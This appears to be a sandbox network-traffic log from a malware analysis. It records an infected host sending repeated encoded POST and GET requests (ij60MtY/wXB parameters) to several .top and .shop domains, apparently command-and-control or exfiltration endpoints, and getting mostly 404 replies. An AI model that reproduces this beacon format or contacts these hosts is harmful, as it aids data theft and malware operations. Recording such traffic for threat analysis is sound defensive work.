                                                Aug 27, 2024 08:04:24.214206934 CEST  552  OUT  GET /p1v4/?ij60MtY=XW3vckNGBZMqkh6dDgKTVQdtxgWhQhuqI1UaXPyLgSYWv7ViPFn3HMqwy3qnuuGBWlC3pPEFi6D5pQsjZrraxjUjA6OulNf3kQwJOyuMay6JsEDMWEmFSkY=&wXB=brv4Erb HTTP/1.1
                                                Host: www.itemfilterhub.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:04:24.487061977 CEST  748  IN  HTTP/1.1 404
                                                Date: Tue, 27 Aug 2024 06:04:24 GMT
                                                Content-Type: text/html;charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WJr5VpW%2B3krdXKHO%2BJ0q9YLGkDtX41Iw9HJdiJFEduhkmxMt%2FrdePWKJu25VGObcI4OMoYW6ZAHhAwL860g%2BwnDrHgDeG5eb61cfQ9weCrsQgadXcWyc7FVbFYCPnXB4T%2B0FllSFpEbG"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b99dd2ba8405842-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 61 31 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 35 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: a1<html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.15.0</center></body></html>
                                                Aug 27, 2024 08:04:24.487073898 CEST  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                74          192.168.11.20  49916        203.161.46.205  80
                                                Timestamp  Bytes transferred  Direction  Data
                                                Aug 27, 2024 08:04:29.671473980 CEST  814  OUT  POST /veti/ HTTP/1.1
                                                Host: www.bullbord.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.bullbord.top
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.bullbord.top/veti/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 50 52 59 6c 53 78 55 30 42 4a 48 56 34 39 52 2b 61 42 42 78 39 7a 30 5a 45 5a 34 69 6e 58 6c 64 67 47 54 41 50 30 4a 2b 4c 73 65 44 46 43 46 42 2f 39 58 64 76 67 68 67 7a 6a 55 30 35 79 70 67 6a 6e 61 45 4a 55 43 2b 57 6b 78 4f 4e 65 76 4b 6c 77 7a 61 4e 54 70 4a 75 6a 74 57 75 64 78 63 68 76 6a 53 44 68 74 38 42 68 4b 4d 71 58 5a 6a 4e 38 62 36 6d 35 4b 61 69 55 39 7a 70 4b 6a 48 73 52 69 4e 56 74 78 48 4c 30 5a 4f 42 61 77 68 4a 6d 4a 58 70 58 4d 75 78 4b 53 73 71 67 71 76 59 70 37 6a 32 41 46 65 65 69 57 63 38 38 56 6e 6e 42 67 6e 57 75 6c 39 4a 2b 6b 4e 55 65 67 68 44 67 3d 3d
                                                Data Ascii: ij60MtY=PRYlSxU0BJHV49R+aBBx9z0ZEZ4inXldgGTAP0J+LseDFCFB/9XdvghgzjU05ypgjnaEJUC+WkxONevKlwzaNTpJujtWudxchvjSDht8BhKMqXZjN8b6m5KaiU9zpKjHsRiNVtxHL0ZOBawhJmJXpXMuxKSsqgqvYp7j2AFeeiWc88VnnBgnWul9J+kNUeghDg==
                                                Aug 27, 2024 08:04:29.841197014 CEST  1289  IN  HTTP/1.1 404 Not Found
                                                Date: Tue, 27 Aug 2024 06:04:29 GMT
                                                Server: Apache
                                                Content-Length: 16052
                                                Connection: close
                                                Content-Type: text/html
                                                Aug 27, 2024 08:04:29.841799974 CEST1289INData Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30
                                                Data Ascii: style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.03816
                                                Aug 27, 2024 08:04:30.006048918 CEST1289INData Raw: 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 34 35 31 35 2c 2d 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d
                                                Data Ascii: sform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.49951 0.001,0.66667 0.16767,0.16717 0.68771,0.16717 0.89053,0.36949 0.20282,0.202


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                75 | 192.168.11.20 | 49917 | 203.161.46.205 | 80
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:04:32.373034954 CEST | 1154 | OUT | POST /veti/ HTTP/1.1
                                                Host: www.bullbord.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.bullbord.top
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.bullbord.top/veti/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:04:32.544738054 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                Date: Tue, 27 Aug 2024 06:04:32 GMT
                                                Server: Apache
                                                Content-Length: 16052
                                                Connection: close
                                                Content-Type: text/html


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                76 | 192.168.11.20 | 49918 | 203.161.46.205 | 80
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:04:35.077394009 CEST | 2578 | OUT | POST /veti/ HTTP/1.1
                                                Host: www.bullbord.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.bullbord.top
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.bullbord.top/veti/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:04:35.594274044 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                Date: Tue, 27 Aug 2024 06:04:35 GMT
                                                Server: Apache
                                                Content-Length: 16052
                                                Connection: close
                                                Content-Type: text/html


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                77 | 192.168.11.20 | 49919 | 203.161.46.205 | 80
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:04:37.776644945 CEST | 546 | OUT | GET /veti/?ij60MtY=CTwFRHkEL7GCscIqZBh2ghsqK7sG3QtVuFrIQG0IMtDLIws7wIuLhg5F5RICghophROLKQKALEwFGf2MtTv3MXBKvDNA89h+ifbsdhYGPDKJkkgMD8vmo5o=&wXB=brv4Erb HTTP/1.1
                                                Host: www.bullbord.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:04:37.945152998 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                Date: Tue, 27 Aug 2024 06:04:37 GMT
                                                Server: Apache
                                                Content-Length: 16052
                                                Connection: close
                                                Content-Type: text/html; charset=utf-8
                                                Data Ascii: id="path4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse
                                                Aug 27, 2024 08:04:37.945844889 CEST1289INData Raw: 30 2e 31 33 30 31 20 7a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a
                                                Data Ascii: 0.1301 z" style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170
                                                Aug 27, 2024 08:04:38.109497070 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 34 35 31 35 2c 2d 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 30 22 0a
                                                Data Ascii: transform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.49951 0.001,0.66667 0.16767,0.16717 0.68771,0.16717 0.89053,0.3694


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                78 | 192.168.11.20 | 49920 | 18.183.3.45 | 80
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:04:43.390801907 CEST | 832 | OUT | POST /y82c/ HTTP/1.1
                                                Host: www.cannulafactory.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.cannulafactory.top
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.cannulafactory.top/y82c/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:04:43.652978897 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx/1.20.1
                                                Date: Tue, 27 Aug 2024 06:04:43 GMT
                                                Content-Type: text/html
                                                Content-Length: 3971
                                                Connection: close
                                                ETag: "6526681e-f83"


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                79 | 192.168.11.20 | 49921 | 18.183.3.45 | 80
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:04:46.186429977 CEST | 1172 | OUT | POST /y82c/ HTTP/1.1
                                                Host: www.cannulafactory.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.cannulafactory.top
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.cannulafactory.top/y82c/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:04:46.449707031 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx/1.20.1
                                                Date: Tue, 27 Aug 2024 06:04:46 GMT
                                                Content-Type: text/html
                                                Content-Length: 3971
                                                Connection: close
                                                ETag: "6526681e-f83"


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                80 | 192.168.11.20 | 49922 | 18.183.3.45 | 80
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:04:48.987231970 CEST | 2578 | OUT | POST /y82c/ HTTP/1.1
                                                Host: www.cannulafactory.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.cannulafactory.top
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.cannulafactory.top/y82c/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:04:49.254020929 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx/1.20.1
                                                Date: Tue, 27 Aug 2024 06:04:49 GMT
                                                Content-Type: text/html
                                                Content-Length: 3971
                                                Connection: close
                                                ETag: "6526681e-f83"


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                81 | 192.168.11.20 | 49923 | 18.183.3.45 | 80
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:04:51.780174017 CEST | 552 | OUT | GET /y82c/?wXB=brv4Erb&ij60MtY=sLiZbFdk0bb3LADauL00iEPz4ezLfDKRfqlDl/6kvE4DPkuqbR8aqfEySQ7vKfLRZ5tGFHhzrS3SF8murk9fEOV453YSzWktCGZAKUV3HiBT9SXvdO/vw9M= HTTP/1.1
                                                Host: www.cannulafactory.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:04:52.048980951 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx/1.20.1
                                                Date: Tue, 27 Aug 2024 06:04:51 GMT
                                                Content-Type: text/html
                                                Content-Length: 3971
                                                Connection: close
                                                ETag: "6526681e-f83"
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                                                Aug 27, 2024 08:04:52.049109936 CEST | 1289 | IN
                                                Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #900; font-size: 1.1em;
                                                Aug 27, 2024 08:04:52.049124002 CEST | 1289 | IN
                                                Data Ascii: is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your website. This
                                                Aug 27, 2024 08:04:52.049134970 CEST | 277 | IN
                                                Data Ascii: ="32" /></a> <a href="http://www.redhat.com/"><img src="poweredby.png" alt="[ Powered by Red Hat Enterprise Linux ]" width="88" height="31" /></a> </div>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                82 | 192.168.11.20 | 49924 | 154.23.184.207 | 80
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:04:57.916975021 CEST | 802 | OUT | POST /pcjw/ HTTP/1.1
                                                Host: www.7ddw.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.7ddw.top
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.7ddw.top/pcjw/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Ascii: ij60MtY=FpNaodwtk1yjLsTtS8B0JCuVhTT8LyuBL+L2QuF1idwMh1WWTpzZIYdhwAFgfC4vscmcYYezxkyOkv2jmSwmAkJ7+DR8AY8l/oeI/NVb54iPC7ynH/xAGHIVFtanIHV9nFPLE4qD0jBezi2EhQiF1F6Ojz8B0t7PFPzuEMCNWSe97YihSUuTYzzx15FZ7gZEGg==
                                                Aug 27, 2024 08:04:58.240266085 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 27 Aug 2024 06:04:58 GMT
                                                Content-Type: text/html
                                                Content-Length: 148
                                                Connection: close
                                                ETag: "66a62378-94"
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                83 | 192.168.11.20 | 49925 | 154.23.184.207 | 80
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:05:00.754173040 CEST | 1142 | OUT | POST /pcjw/ HTTP/1.1
                                                Host: www.7ddw.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.7ddw.top
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.7ddw.top/pcjw/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Ascii: ij60MtY= [TRUNCATED]
                                                Aug 27, 2024 08:05:01.056082964 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 27 Aug 2024 06:05:00 GMT
                                                Content-Type: text/html
                                                Content-Length: 148
                                                Connection: close
                                                ETag: "66a62378-94"
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                84 | 192.168.11.20 | 49926 | 154.23.184.207 | 80
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:05:03.605206013 CEST | 2578 | OUT | POST /pcjw/ HTTP/1.1
                                                Host: www.7ddw.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.7ddw.top
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.7ddw.top/pcjw/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Ascii: ij60MtY= [TRUNCATED]
                                                Aug 27, 2024 08:05:04.533427000 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 27 Aug 2024 06:05:03 GMT
                                                Content-Type: text/html
                                                Content-Length: 148
                                                Connection: close
                                                ETag: "66a62378-94"
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                85 | 192.168.11.20 | 49927 | 154.23.184.207 | 80
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:05:06.436834097 CEST | 542 | OUT | GET /pcjw/?ij60MtY=Irl6roAKlXX+S/z4d/JGSgOFtgPcZWv0Ad/WGuEavtEpunmIUZ/WLqk+3ThtGR85672FVpbJ7guSoPSbpRkmFzROuSw6a7kz1v/qj+IPw73pHtOII/dFP3E=&wXB=brv4Erb HTTP/1.1
                                                Host: www.7ddw.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:05:06.738729954 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 27 Aug 2024 06:05:06 GMT
                                                Content-Type: text/html
                                                Content-Length: 148
                                                Connection: close
                                                ETag: "66a62378-94"
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                86 | 192.168.11.20 | 49928 | 185.230.15.3 | 80
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:05:12.002552986 CEST | 823 | OUT | POST /ns8q/ HTTP/1.1
                                                Host: www.home-check.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.home-check.shop
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.home-check.shop/ns8q/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Ascii: ij60MtY=Fl3Y1slJcSGC2KeULugnWaY5ofaYBYaVPaoGjYj/5q/WXh53KUpMRXprGgftF/va/YMeTB9pDhjukz9XBiijkfbEqEiAu/L+W9nHQaX09PTaXKXuTezwYWUwoCmzJwjwic4eK6LskKCp0fUlN76E94sckFs1aR8bTZ0F77TDYDCZNtugJnF9srRkBzqTsqQzcQ==
                                                Aug 27, 2024 08:05:12.296715021 CEST | 292 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 27 Aug 2024 06:05:12 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Content-Encoding: gzip


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                87 | 192.168.11.20 | 49929 | 185.230.15.3 | 80
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:05:14.782661915 CEST | 1163 | OUT | POST /ns8q/ HTTP/1.1
                                                Host: www.home-check.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.home-check.shop
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.home-check.shop/ns8q/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Ascii: ij60MtY= [TRUNCATED]
                                                Aug 27, 2024 08:05:15.073818922 CEST | 292 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 27 Aug 2024 06:05:14 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Content-Encoding: gzip


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                88 | 192.168.11.20 | 49930 | 185.230.15.3 | 80
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:05:17.563122034 CEST | 2578 | OUT | POST /ns8q/ HTTP/1.1
                                                Host: www.home-check.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.home-check.shop
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.home-check.shop/ns8q/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
